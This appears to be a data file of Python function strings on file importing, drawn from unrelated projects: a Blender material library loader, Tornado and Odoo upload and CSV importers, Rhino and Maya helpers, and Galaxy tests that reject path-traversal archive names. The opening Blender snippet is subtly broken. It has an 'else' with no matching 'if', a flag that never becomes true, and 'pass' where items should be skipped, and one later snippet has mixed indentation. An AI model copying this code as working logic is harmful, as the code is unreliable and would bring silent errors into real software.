xroot = tree.getroot()\r\n blib = False\r\n xversion = Version(xroot.attrib[\"compatible\"])\r\n if xversion > version:\r\n raise BlibVersionError(\"File has incompatible version of blib\")\r\n \r\n else:\r\n raise InvalidBlibFile(\"File is not a Blender library\")\r\n \r\n if xroot.tag != \"blib\":\r\n raise InvalidBlibFile(\"File is not a Blender library\")\r\n \r\n if xroot.attrib[\"type\"] != \"cycles\":\r\n raise BlibTypeError(\"File is not a valid Cycles material\")\r\n \r\n failed = {}\r\n imgs = {}\r\n txts = {}\r\n txt_paths = {}\r\n grps = {}\r\n scripts = {}\r\n resources = {\r\n \"images\": imgs,\r\n \"texts\": txts,\r\n \"text_paths\": txt_paths,\r\n \"groups\": grps,\r\n \"scripts\": scripts,\r\n }\r\n txt_dir = ResourceDir(\"texts\", resource_path)\r\n xres = xroot.find(\"resources\")\r\n \r\n #Import resources\r\n if xres is not None:\r\n ximgs = xres.find(\"images\")\r\n xtxts = xres.find(\"texts\")\r\n xgrps = xres.find(\"groups\")\r\n tmp_path = ResourceDir(\"tmp\", resource_path)\r\n path_dict = {}\r\n \r\n #Images\r\n if ximgs is not None and (imgi_import or imge_import or seq_import or mov_import) and blib:\r\n img_dir = ResourceDir(\"images\", resource_path)\r\n hash_dict = None\r\n sfv_update = False\r\n for ximg in ximgs:\r\n if ximg.attrib[\"source\"] in {'FILE', 'GENERATED'}:\r\n if ximg.attrib[\"origin\"] == \"internal\":\r\n if not imgi_import:\r\n pass\r\n else:\r\n if not imge_import:\r\n pass\r\n elif ximg.attrib[\"source\"] == 'SEQUENCE':\r\n if not seq_import:\r\n pass\r\n elif ximg.attrib[\"source\"] == 'MOVIE':\r\n if not mov_import:\r\n pass\r\n \r\n #Write image to temporary folder, and pack in Blender\r\n if ximg.attrib[\"source\"] in {'FILE', 'GENERATED'} and (img_embed or (img_embed is None and ximg.attrib[\"origin\"] == \"internal\")):\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(tmp_path), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n try:\r\n img = bpy.data.images.load(ipath)\r\n except:\r\n fail(failed, \"images\", \"import image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.source = ximg.attrib[\"source\"]\r\n try:\r\n img.pack()\r\n except:\r\n bpy.data.images.remove(img)\r\n fail(failed, \"images\", \"pack image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.filepath = \"\"\r\n imgs[ximg.attrib[\"name\"]] = img\r\n \r\n else: #Write image to resource folder, and load in Blender\r\n if img_merge and ximg.attrib[\"source\"] != 'SEQUENCE': #Use existing image in resources if available\r\n try:\r\n comment = archive.getinfo(ximg.attrib[\"path\"]).comment.decode(\"utf-8\")\r\n except KeyError:\r\n fail(failed, \"images\", \"import image '{}', file is missing\".format(ximg.attrib[\"path\"]))\r\n pass\r\n \r\n com_path = path_dict[comment] if comment != \"\" else \"\"\r\n com_name = path.basename(path.dirname(com_path))\r\n if comment != \"\" and com_name != \"tmp\":\r\n ipath = com_path\r\n path_dict[ximg.attrib[\"path\"]] = ipath\r\n else:\r\n #Create hash dictionary only in the first iteration\r\n if hash_dict is None:\r\n hash_path = path.join(img_dir.root, \"list.sfv\")\r\n hash_dict = {}\r\n if path.isfile(hash_path):\r\n sfv = re.compile(r\"(.*) (.*?)$\")\r\n hash_file = open(hash_path, 'r', encoding=\"utf-8\")\r\n for line in hash_file:\r\n key = sfv.sub(r\"\\2\", line).strip()\r\n val = sfv.sub(r\"\\1\", line).strip()\r\n if key in hash_dict and val in hash_dict[key]:\r\n sfv_update = True\r\n else:\r\n hash_dict.setdefault(key, []).append(val)\r\n hash_file.close()\r\n hash_bkp = hash_dict.copy()\r\n \r\n #Check if files match and set path to appropriate image\r\n img_path = ximg.attrib[\"path\"] if comment == \"\" else comment\r\n try:\r\n crc = format(archive.getinfo(img_path).CRC, 'x')\r\n except KeyError:\r\n fail(failed, \"images\", \"import image '{}', file is missing\".format(ximg.attrib[\"path\"]))\r\n pass\r\n \r\n if crc in hash_dict:\r\n i = 0\r\n while i < len(hash_dict[crc]):\r\n val = hash_dict[crc][i]\r\n fpath = path.join(img_dir.root, val)\r\n if path.isfile(fpath):\r\n fsize = path.getsize(fpath)\r\n zsize = archive.getinfo(img_path).file_size\r\n if fsize == zsize:\r\n ffile = open(fpath, 'rb')\r\n zfile = archive.open(img_path, 'r')\r\n if files_equal(ffile, zfile):\r\n ipath = fpath\r\n path_dict[ximg.attrib[\"path\"]] = ipath\r\n ffile.close()\r\n zfile.close()\r\n break\r\n ffile.close()\r\n zfile.close()\r\n else:\r\n hash_dict[crc].remove(val)\r\n i -= 1\r\n i += 1\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n hash_dict[crc].append(path.relpath(ipath, img_dir.root))\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n hash_dict[crc] = [path.relpath(ipath, img_dir.root)]\r\n else: #Use image in archive, even if duplicate\r\n if ximg.attrib[\"source\"] == 'SEQUENCE':\r\n seq_dir = path.dirname(ximg.attrib[\"path\"])\r\n dir_name = ximg.attrib[\"path\"].split(\"/\")[-2]\r\n seq_path = path.join(str(img_dir), dir_name)\r\n makedirs(seq_path)\r\n seq_imgs = [img for img in archive.namelist() if img.startswith(seq_dir)]\r\n for img in seq_imgs:\r\n i_tmp_path = extract_image(archive, img, seq_path, path_dict, failed)\r\n if img == ximg.attrib[\"path\"]:\r\n ipath = i_tmp_path\r\n if ipath is None:\r\n break\r\n if ipath is None:\r\n rmtree(seq_path)\r\n pass\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n #load image to Blender\r\n try:\r\n img = bpy.data.images.load(ipath)\r\n except:\r\n fail(failed, \"images\", \"import image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.source = ximg.attrib[\"source\"]\r\n imgs[ximg.attrib[\"name\"]] = img\r\n \r\n if tmp_path:\r\n for item in listdir(str(tmp_path)):\r\n fpath = path.join(str(tmp_path), item)\r\n if path.isfile(fpath):\r\n remove(fpath)\r\n \r\n #Update hash file if list has changed\r\n if hash_dict is not None and (hash_dict != hash_bkp or sfv_update):\r\n hash_path = path.join(img_dir.root, \"list.sfv\")\r\n hash_file = open(hash_path, 'w', encoding=\"utf-8\")\r\n for key in hash_dict:\r\n for val in hash_dict[key]:\r\n hash_file.write(val + \" \" + key + \"\\n\")\r\n hash_file.close()\r\n \r\n #Texts\r\n if xtxts is not None and (txti_import or txte_import):\r\n for xtxt in xtxts:\r\n if xtxt.attrib[\"origin\"] == \"internal\":\r\n if txti_import:\r\n if \"path\" in xtxt.attrib:\r\n if blib:\r\n if txt_embed == False:\r\n import_texts(\"zip\", \"ext\", xtxt, txts, failed, archive, txt_dir)\r\n else:\r\n import_texts(\"zip\", \"int\", xtxt, txts, failed, archive, txt_dir)\r\n else:\r\n if txt_embed == False:\r\n import_texts(\"xml\", \"ext\", xtxt, txts, failed, None, txt_dir)\r\n else:\r\n import_texts(\"xml\", \"int\", xtxt, txts, failed, None, txt_dir)\r\n \r\n else:\r\n if txte_import:\r\n if \"path\" in xtxt.attrib:\r\n if blib:\r\n if txt_embed == True:\r\n import_texts(\"zip\", \"int\", xtxt, txts, failed, archive, txt_dir, txt_paths)\r\n else:\r\n import_texts(\"zip\", \"ext\", xtxt, txts, failed, archive, txt_dir, txt_paths)\r\n else:\r\n if txt_embed == True:\r\n import_texts(\"xml\", \"int\", xtxt, txts, failed, None, txt_dir, txt_paths)\r\n else:\r\n import_texts(\"xml\", \"ext\", xtxt, txts, failed, None, txt_dir, txt_paths)\r\n \r\n #Groups\r\n if xgrps is not None:\r\n for xgrp in xgrps:\r\n xnodes = xgrp.find(\"nodes\")\r\n xlinks = xgrp.find(\"links\")\r\n grp = bpy.data.node_groups.new(xgrp.attrib[\"name\"], xgrp.attrib[\"bl_idname\"])\r\n grps[xgrp.attrib[\"name\"]] = grp\r\n if xnodes is not None:\r\n build_tree(xnodes, xlinks, grp, resources, txt_embed, txt_dir, blib, script_import, archive, failed)\r\n \r\n #Import material\r\n xmat = xroot.find(\"main\")\r\n \r\n if xmat is not None:\r\n xcycles = xmat.find(\"cycles_settings\")\r\n xnodes = xmat.find(\"nodes\")\r\n xlinks = xmat.find(\"links\")\r\n \r\n mat = bpy.data.materials.new(xmat.attrib[\"name\"])\r\n set_attributes(mat, xmat, failed)\r\n set_attributes(mat.cycles, xcycles, failed)\r\n mat.use_nodes = True\r\n mat.node_tree.nodes.clear()\r\n build_tree(xnodes, xlinks, mat.node_tree, resources, txt_embed, txt_dir, blib, script_import, archive, failed)\r\n if blib:\r\n archive.close()\r\n for f in failed:\r\n print(\"{} {} failed to be imported/assigned.\".format(failed[f], f))\r\n return mat\r\n else:\r\n if blib:\r\n archive.close()\r\n for f in failed:\r\n print(\"{} {} failed to be imported/assigned.\".format(failed[f], f))\r\n return grp",
"def importar(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def importar3(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n print(\"flacoooo\")\n print(str(datetime.now()))\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n print(\"end flacooo\")\n print(str(datetime.now()))\n if extn == '.xlsx':\n mee = self.manager3(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def action_import(self):\n ctx = self._context\n \n data = base64.b64decode(self.data)\n file_input = cStringIO.StringIO(data)\n file_input.seek(0)\n reader_info = []\n if self.delimeter:\n delimeter = str(self.delimeter)\n else:\n delimeter = ','\n reader = csv.reader(file_input, delimiter=delimeter,\n lineterminator='\\r\\n')\n try:\n reader_info.extend(reader)\n except Exception:\n raise exceptions.Warning(_(\"Not a valid file!\"))\n keys = reader_info[0]",
"def importar4(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager4(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def action_import(self):\n ctx = self._context\n account_obj = self.env[\"account.account\"]\n import_obj = self.env['import.journal.entries.advanced']\n import_line_obj = self.env[\"journal.entries.csv.import\"]\n if 'active_id' in ctx:\n import_id = import_obj.browse(ctx['active_id'])\n if not self.data:\n raise exceptions.Warning(_(\"Necesitas seleccionar un archivo!\"))\n # Decode the file data\n data = base64.b64decode(self.data).decode('utf-8')\n file_input = StringIO(data)\n file_input.seek(0)\n reader_info = []\n if self.delimeter:\n delimeter = str(self.delimeter)\n else:\n delimeter = ','\n reader = csv.reader(file_input, delimiter=delimeter,\n lineterminator='\\r\\n')\n try:\n reader_info.extend(reader)\n except Exception:\n raise exceptions.Warning(_(\"Archivo no valido\"))\n keys = reader_info[0]\n # check if keys exist\n if not isinstance(keys, list) or ('cuenta' not in keys):\n raise exceptions.Warning(_(\"No se encuentran 'cuentas' contable en el archivo\"))\n del reader_info[0]\n values = {}\n actual_date = fields.Date.today()\n for i in range(len(reader_info)):\n val = {}\n field = reader_info[i]\n values = dict(zip(keys, field))\n account = False\n if 'cuenta' in values and values['cuenta']:\n account_id = account_obj.search([('code', '=', values['cuenta'])]) \n if account_id:\n account = account_id[0]\n else:\n account = account_id\n\n val[\"ref\"] = values[\"descripcion\"]\n val[\"document_number\"] = values[\"num_documento\"]\n val[\"document_date\"] = datetime.strptime(values[\"fecha\"] , \"%d-%m-%Y\")\n val['account_id'] = account.id\n val['parent_id'] = import_id.id\n val['debit'] = values['debito']\n val['credit'] = values['credito']\n val['processed'] = False\n validate = import_line_obj.create(val)\n if validate:\n if validate.account_id:\n validate.is_ok = True",
"def AgiImport(dirpath, file):\n objPath=dirpath+'\\\\'+file\n if os.path.exists(objPath)==False:\n print objPath\n return\n \n ## Open new template file ##\n template = rs.TemplateFile()\n cmd=\"-_New \"\n cmd+=template+\" \"\n rs.Command(cmd)\n \n \n cmd=\"-_Import \"\n cmd+='\"'+os.path.abspath(objPath)+'\"'+\" \"\n cmd+=\"IgnoreTextures=No \"\n cmd+=\"MapOBJToRhinoZ=Yes \"\n cmd+=\"_Enter \"\n rs.Command(cmd)\n \n rs.Command(\"SplitDisjointMesh \")\n \n meshes = rs.LastCreatedObjects()\n max=0\n keep=None\n for guid in meshes:\n mesh = rs.coercemesh(guid)\n count = mesh.Faces.Count\n if count > max:\n keep = guid\n max = count\n \n if keep:\n meshes.remove(keep)\n rs.DeleteObjects(meshes)\n \n rs.ZoomExtents(all=True)\n \n cmd=\"-_SaveAs \"\n cmd+=\"SaveTextures=Yes \"\n cmd+='\"'+os.path.abspath(objPath).replace(\".wrl\",\".3dm\")+'\"'+\" \"\n cmd+=\"_Enter \"\n rs.Command(cmd)\n rs.DocumentModified(False)\n Rhino.RhinoApp.Wait()\n Rhino.RhinoApp.Wait()",
"def importExternal(*args):\n goTo = pi.currentProject\n impFile = cmds.fileDialog2(fm=1, dir = goTo)[0]\n if impFile:\n cmds.file(impFile, i=True)",
"def importObject(portal, file_name):\n try:\n portal.manage_importObject(file_name)\n except:\n portal._p_jar = portal.Destination()._p_jar\n portal.manage_importObject(file_name)",
"def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)\n bento = bento_store.get(bento_tag)\n out_path = bento.export(out_path)\n logger.info(\"%s exported to %s.\", bento, out_path)",
"def action_import(self):\n ctx = self._context\n attachment_obj = self.env['ir.attachment']\n invoice_obj = self.env['account.invoice']\n storage = attachment_obj._storage()\n filestore = attachment_obj._filestore()\n file_gc = attachment_obj._file_gc()\n indir = self.name#+'/E-Faktur'\n files_in_dir = os.listdir(indir)\n in_dir = []\n for x in files_in_dir:\n r = open(indir+\"/\"+x,'rb').read().encode('base64')\n _logger.info(\"_read_file reading %s\", x)\n if len(x) == 67:\n #_logger.info(\"_read_file valid file efaktur %s\", x)\n faktur_pajak = x.split(\"-\")\n #SEARCH INVOICE YG SUDAH TERFALIDASI DAN ADA FAKTUR PAJAK\n invoice_ids = invoice_obj.search([('nomor_faktur_id','!=',None),('move_id','!=',None),('nomor_faktur_id.number','ilike',faktur_pajak[1][8:])])\n #CARI APAKAH SUDAH TERATTACHMENT DI SISTEM\n attachment_ids = attachment_obj.search([('datas','!=',r),('res_id','in',invoice_ids.ids),('res_model','=','account.invoice'),('name','=',faktur_pajak[1])])\n if not attachment_ids and invoice_ids:\n for invoice in invoice_ids:\n values = {\n 'res_model': 'account.invoice',\n 'company_id': 1,\n 'res_name': invoice.number,#NOMOR INVOICE\n 'datas_fname': x,#NAMA FILE\n 'type': 'binary',\n 'res_id': invoice.id,\n 'name': x,#faktur_pajak[1],\n 'mimetype': 'application/pdf',\n 'store_fname': 'E-Faktur/'+x,\n 'datas': r,\n }\n attachment_obj.create(values)\n _logger.info(\"_uploaded_file %s\", x)",
"def import_file(filename):\n if not os.path.exists(filename): return 0\n if zipfile.is_zipfile(filename):\n infp = zipfile.ZipFile(filename)\n elif tarfile.is_tarfile(filename):\n infp = tarfile.TarFile(filename)\n else: # regular file\n infp = RegFile(filename)\n name_list =infp.namelist()\n director = {}\n VALUES = {} \n if \"USERNAME\" in os.environ:\n VALUES[\"USER\"] = os.environ[\"USERNAME\"] # NameId\n if \"HOMEPATH\" in os.environ:\n VALUES[\"HOME\"] = 'C:' + os.sep + os.environ[\"HOMEPATH\"]\n if \"HOME\" in os.environ:\n VALUES[\"HOME\"] = os.environ[\"HOME\"]\n if \"USERPROFILE\" in os.environ:\n VALUES[\"HOME\"] = os.environ[\"USERPROFILE\"]\n globalspath, f = myro.globvars.__file__.rsplit(os.sep, 1)\n #print \"globalspath:\", globalspath\n myropath, f = globalspath.rsplit(os.sep, 1)\n #print \"myropath:\", myropath\n sitepath, f = myropath.rsplit(os.sep, 1)\n #print \"sitepath:\", sitepath\n myroparts = myropath.split(os.sep)\n pythonpath = myroparts[0] + os.sep + myroparts[1]\n VALUES[\"DESKTOP\"] = VALUES[\"HOME\"] + os.sep + \"DESKTOP\" \n VALUES[\"PYTHONDIR\"] = pythonpath\n VALUES[\"MYRODIR\"] = myropath\n VALUES[\"PYTHONSITEDIR\"] = sitepath\n VALUES[\"PYTHONDIR\"] = pythonpath\n install_count = 0\n if \"MANIFEST\" in name_list:\n manifest = infp.read(\"MANIFEST\")\n lines = manifest.split(\"\\n\")\n for line in lines:\n if \":\" in line:\n f, dest = map(string.strip, line.strip().split(\":\"))\n director[f] = dest % VALUES\n for name in name_list:\n if name == \"MANIFEST\": continue\n contents = infp.read(name)\n print \" writing:\", director[name], \"...\"\n # first write to temp file:\n try:\n outfp = open(director[name], \"wb\")\n except:\n makePath(director[name])\n outfp = open(director[name], \"wb\")\n outfp.write(contents)\n outfp.close()\n install_count += 1\n else:\n print \" ERROR: no MANIFEST in Myro upgrade; skipping\"\n infp.close()\n return install_count",
"def import_from_file(jamsite, source='jammers.csv', fieldnames=None):\n\t# import jammers.csv\n\twith open(source) as csvfile:\n\t\tjamsite.mergeinsert( import_jammers(csvfile, fieldnames=fieldnames) )",
"def importar5(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager5(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def doImport(self,textFile):\n self.loadText(textFile)\n self.getBooks()\n #self.copyBooks()\n self.genLibData()\n self.genLibCells()\n self.sortRecords()",
"def _CMD_IMPORT(self, file_name):\n # reset inspector:\n # self.inspector = DataInspectorRecord()\n\n ext = file_name.split('.')[-1]\n if ext == 'mat':\n # self.model.from_json_dict(buff)\n self.model.from_mat_file(file_name)\n\n elif ext == 'json':\n buff = ''\n with open(file_name, 'rb') as f:\n buff = f.read()\n model = json.loads(buff)\n self.model.from_json_dict(model)\n\n else:\n raise DataExplorerError('Unsupported file format: {}'.format(ext))\n\n # update initial selection - first row:\n if len(self.model.data_list) > 0:\n self.handle_row_select([self.model.data_list[0]])",
"def importIntoFile(filename, outputFile):\n\t#grab contents of current file\n\tcurrFile = open(filename).read().splitlines()\n\n\t#export file\n\twFile = open(outputFile, 'w+')\n\n\tprint \"\\tImporting into \" + outputFile + \":\\n\\t\\t\",\n\n\t#parse and write\n\tskipWrite = False\n\tspaceAppend = \"\"\n\tfor line in currFile:\n\t\tif line.find(importStrL) != -1:\n\t\t\tskipWrite = True\n\t\t\twFile.write(line)\n\t\t\t#handling indentation and space consistency\n\t\t\tif re.match(r\"\\s+\", line) == None:\n\t\t\t\tspaceAppend = \"\"\n\t\t\telse:\n\t\t\t\tspaceAppend = re.match(r\"\\s+\", line).group()\n\t\t\tline = line.replace(importStrL, \"\").replace(importStrR, \"\").strip()\n\t\t\twFile.write('\\n')\n\t\t\t#import lines, matching indentation\n\t\t\tfor importLine in cactusImports[line]:\n\t\t\t\twFile.write(spaceAppend + importLine + '\\n')\n\t\t\tprint line,\n\t\telse:\n\t\t\tif line.find(endStr) != -1:\n\t\t\t\tskipWrite = False\n\t\t\tif not skipWrite:\n\t\t\t\twFile.write(line+'\\n')\n\tprint '\\n'\n\twFile.close()",
"def manual_import_genesis(self, path):\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu)",
"def file_import(self):\r\n\r\n try:\r\n self.process_file_import()\r\n except InputError as ex:\r\n print(ex)\r\n self.file_import()",
"def _add_demo_import(self):\r\n # add out completed one\r\n q = ImportQueue(\r\n username=u'admin',\r\n file_path=u'testing.txt'\r\n )\r\n DBSession.add(q)\r\n transaction.commit()\r\n return",
"def import_click(self):\n path = self.path.get()\n if not path:\n self.error_label.config(text='Alege baza de date.')\n return\n\n password = self.pass_entry.get()\n if not password:\n self.error_label.config(text='Introdu parola.')\n return\n\n try:\n sharing.import_database(self.us, path, password)\n self.error_label.config(text='Am importat baza de date cu succes.')\n except InvalidToken:\n self.error_label.config(text='Parolă incorectă.')",
"def import_module(self, location, name):",
"def import_diff(diff_path, state_download_path, config):\n logging.info(\"Importing with imposm\")\n imposm_config_path = config[\"imposm_config_path\"]\n subprocess.call([\"imposm3\", \"diff\", \"--config=%s\" % imposm_config_path, diff_path])",
"def convert_placards():\n\n local('cd import_scripts;../bin/python import_placards.py import')",
"def step_3b(browser):\n xml_file = '../../src/imio.project.pst/src/imio/project/pst/model/PST_eComptes_Export_201805V1.xsd'\n # select xml file\n file_field = browser.find(u'Document XML exporté depuis eComptes')\n with open(xml_file, 'r') as f:\n file_field.set('value', (f.read(), 'ecomptes_pst.xml'))\n # import xml file\n browser.find_button_by_label('Importer').click()\n # write browser contents\n # with open('browser_contents', 'w') as f:\n # f.write(browser.contents)",
"def test_history_import_abspath_in_archive():\n dest_parent = mkdtemp()\n arcname_prefix = os.path.abspath(os.path.join(dest_parent, 'insecure'))\n\n with HistoryArchive(arcname_prefix=arcname_prefix) as history_archive:\n history_archive.write_metafiles()\n history_archive.write_file('datasets/Pasted_Entry_1.txt', 'foo')\n history_archive.finalize()\n _run_unpack(history_archive, dest_parent, 'Absolute path in import archive allowed')",
"def ezimport_ln_s(self) -> bool:\n\n cli = CLI()\n cli.register('import', ImportControl, '_')\n cli.register('sessions', SessionsControl, '_')\n cli.invoke(['import',\n '-k', self.conn.getSession().getUuid().val,\n '-s', self.conn.host,\n '-p', str(self.conn.port),\n '--transfer', 'ln_s',\n str(self.file_path)])\n if cli.rv == 0:\n self.imported = True\n print(f'Imported {self.file_path}')\n return True\n else:\n logging.error(f'Import of {self.file_path} has failed!')\n return False",
"def copyToInstanceImport():\n print >> import_out, INTRO_TO_INSTANCE\n instance_ipath, product_ipath = getImportedPathes()\n\n # Compose temp dir back_[date] dir path in Instance import directory\n temp_dir_id = \"back_%s\" % strftime(\"%Y%m%d%H%M%S\", gmtime())\n temp_dir_path = osp.join(instance_ipath, temp_dir_id)\n\n # Get *.zexp files from Skin Product's import dir and Plone's instance import dir files\n product_ilist = [i for i in os.listdir(product_ipath) \\\n if osp.isfile(osp.join(product_ipath,i)) and i.endswith('.zexp')]\n\n instance_ilist = [i for i in os.listdir(instance_ipath) \\\n if osp.isfile(osp.join(instance_ipath,i)) and i.endswith('.zexp')]\n\n # Check for presence samenamed files in Instance and Product import directories.\n same_instance_files = [f_name for f_name in instance_ilist if f_name in product_ilist]\n if same_instance_files:\n moveToTemp(same_instance_files, instance_ipath, temp_dir_path)\n\n # Copy all *zexp files from Product's import dir to Instance's import dir\n [copyFile(product_ipath, instance_ipath, f_name) for f_name in product_ilist]\n print >> import_out, SUMMARY_TO_INSTANCE\n\n return [instance_ipath, product_ipath, temp_dir_path, product_ilist]",
"def importVersion():\n\n try:\n # Attempt to load the template first. It only exists in a working copy cloned via git.\n import version_template\n except ImportError:\n # If loading the template fails we must be in a unpacked source distribution and\n # src/toil/version.py will already exist.\n pass\n else:\n # Use the template to generate src/toil/version.py\n import os\n import errno\n from tempfile import NamedTemporaryFile\n\n new = version_template.expand_()\n\n print(new, sys.stderr)\n \n try:\n with open('bdgenomics/workflows/version.py') as f:\n old = f.read()\n except IOError as e:\n if e.errno == errno.ENOENT:\n old = None\n else:\n raise\n\n if old != new:\n with NamedTemporaryFile(dir='bdgenomics/workflows', prefix='version.py.', delete=False) as f:\n f.write(new)\n os.rename(f.name, 'bdgenomics/workflows/version.py')\n\n import bdgenomics.workflows.version\n return bdgenomics.workflows.version",
"def test_history_import_relpath_in_archive():\n dest_parent = mkdtemp()\n with HistoryArchive(arcname_prefix='../insecure') as history_archive:\n\n history_archive.write_metafiles()\n history_archive.write_file('datasets/Pasted_Entry_1.txt', 'foo')\n history_archive.finalize()\n _run_unpack(history_archive, dest_parent, 'Relative parent path in import archive allowed')",
"def mysql_import():\n # first make another copy of the db\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db_temp.sql\")\n # then import from the backup\n run(\"mysql -u database_user -p -D database_name < ~/tmp/exported_db.sql\")",
"def create_fbx_import_task(\n fbx_path,\n game_path,\n asset_name,\n import_options,\n suppress_ui=True\n):\n # create an import task\n import_task = unreal.AssetImportTask()\n\n # set the base properties on the import task\n import_task.filename = fbx_path\n import_task.destination_path = game_path\n import_task.destination_name = asset_name\n import_task.automated = suppress_ui\n\n # set the import options on the import task\n import_task.options = import_options\n return import_task",
"def import_(self, version):\n #nuke.nodePaste(version.absolute_full_path)\n return True",
"def import_file(factory, dir, file):\n if file[-4:]!='.deb' and file[-5:]!='.udeb':\n log.msg(\"Ignoring (unknown file type):\"+ file, 'import')\n return\n \n log.debug(\"considering: \" + dir + '/' + file, 'import')\n try:\n paths = get_mirror_path(factory, dir+'/'+file)\n except SystemError:\n log.msg(file + ' skipped - wrong format or corrupted', 'import')\n return\n if paths:\n if len(paths) != 1:\n log.debug(\"WARNING: multiple ocurrences\", 'import')\n log.debug(str(paths), 'import')\n cache_path = paths[0]\n else:\n log.debug(\"Not found, trying to guess\", 'import')\n info = AptDpkgInfo(dir+'/'+file)\n cache_path = closest_match(info,\n get_mirror_versions(factory, info['Package']))\n if cache_path:\n log.debug(\"MIRROR_PATH:\"+ cache_path, 'import')\n src_path = dir+'/'+file\n dest_path = factory.cache_dir+cache_path\n \n if not os.path.exists(dest_path):\n log.debug(\"IMPORTING:\" + src_path, 'import')\n dest_path = re.sub(r'/\\./', '/', dest_path)\n if not os.path.exists(dirname(dest_path)):\n os.makedirs(dirname(dest_path))\n f = open(dest_path, 'w')\n fcntl.lockf(f.fileno(), fcntl.LOCK_EX)\n f.truncate(0)\n shutil.copy2(src_path, dest_path)\n f.close()\n if hasattr(factory, 'access_times'):\n atime = os.stat(src_path)[stat.ST_ATIME]\n factory.access_times[cache_path] = atime\n log.msg(file + ' imported', 'import')\n else:\n log.msg(file + ' skipped - already in cache', 'import')\n\n else:\n log.msg(file + ' skipped - no suitable backend found', 'import')",
"def importTag(self):\n release = io.getString('Enter the Melange release to import:')\n if not release:\n error.AbortedByUser('No release provided, import aborted')\n\n branch_dir = 'branches/' + release\n if self.wc.exists(branch_dir):\n raise ObstructionError('Release %s already imported' % release)\n\n tag_url = '%s/tags/%s' % (self.upstream_repos, release)\n release_rev = subversion.find_tag_rev(tag_url)\n\n if io.confirm('Confirm import of release %s, tagged at r%d?' %\n (release, release_rev)):\n # Add an entry to the vendor externals for the Melange\n # release.\n externals = self.wc.propget('svn:externals', 'vendor/soc')\n externals.append('%s -r %d %s' % (release, release_rev, tag_url))\n self.wc.propset('svn:externals', '\\n'.join(externals), 'vendor/soc')\n self.wc.commit('Add svn:externals entry to pull in Melange '\n 'release %s at r%d.' % (release, release_rev))\n\n # Export the tag into the release repository's branches\n subversion.export(tag_url, release_rev, self.wc.path(branch_dir))\n\n # Add and commit the branch add (very long operation!)\n self.wc.add([branch_dir])\n self.wc.commit('Branch of Melange release %s' % release, branch_dir)\n self._switchBranch(release)\n\n # Commit the production GSoC configuration and\n # google-specific patches.\n self._addAppYaml()\n self._applyGooglePatches()\n\n # All done!\n log.info('Melange release %s imported and googlified' % self.branch)",
"def upload_nextcloud_zipfile(import_type: migration.Migration, archive: UploadFile = File(...)):\n dir = app_dirs.MIGRATION_DIR.joinpath(import_type.value)\n dir.mkdir(parents=True, exist_ok=True)\n dest = dir.joinpath(archive.filename)\n\n with dest.open(\"wb\") as buffer:\n shutil.copyfileobj(archive.file, buffer)\n\n if not dest.is_file:\n raise HTTPException(status.HTTP_400_BAD_REQUEST)",
"def import_scene(file_path):\n\n pass",
"def testPreProcessedImport(self):\n a = 'a.mojom'\n self.WriteFile(a, \"\"\"\\\n module a;\n struct Bar {};\"\"\")\n self.ParseMojoms([a])\n\n b = 'b.mojom'\n self.WriteFile(\n b, \"\"\"\\\n module b;\n import \"a.mojom\";\n struct Foo { a.Bar bar; };\"\"\")\n self.ParseMojoms([b])",
"def import_db(import_file):\n import_data(import_file)",
"def pass_import_entry(path, data):\n print \"path:%r data:%r\" % (path,data)\n\tproc = Popen(['pass', 'insert', '--multiline', path], stdin=PIPE, stdout=PIPE)\n\tproc.communicate(data)\n\tproc.wait()",
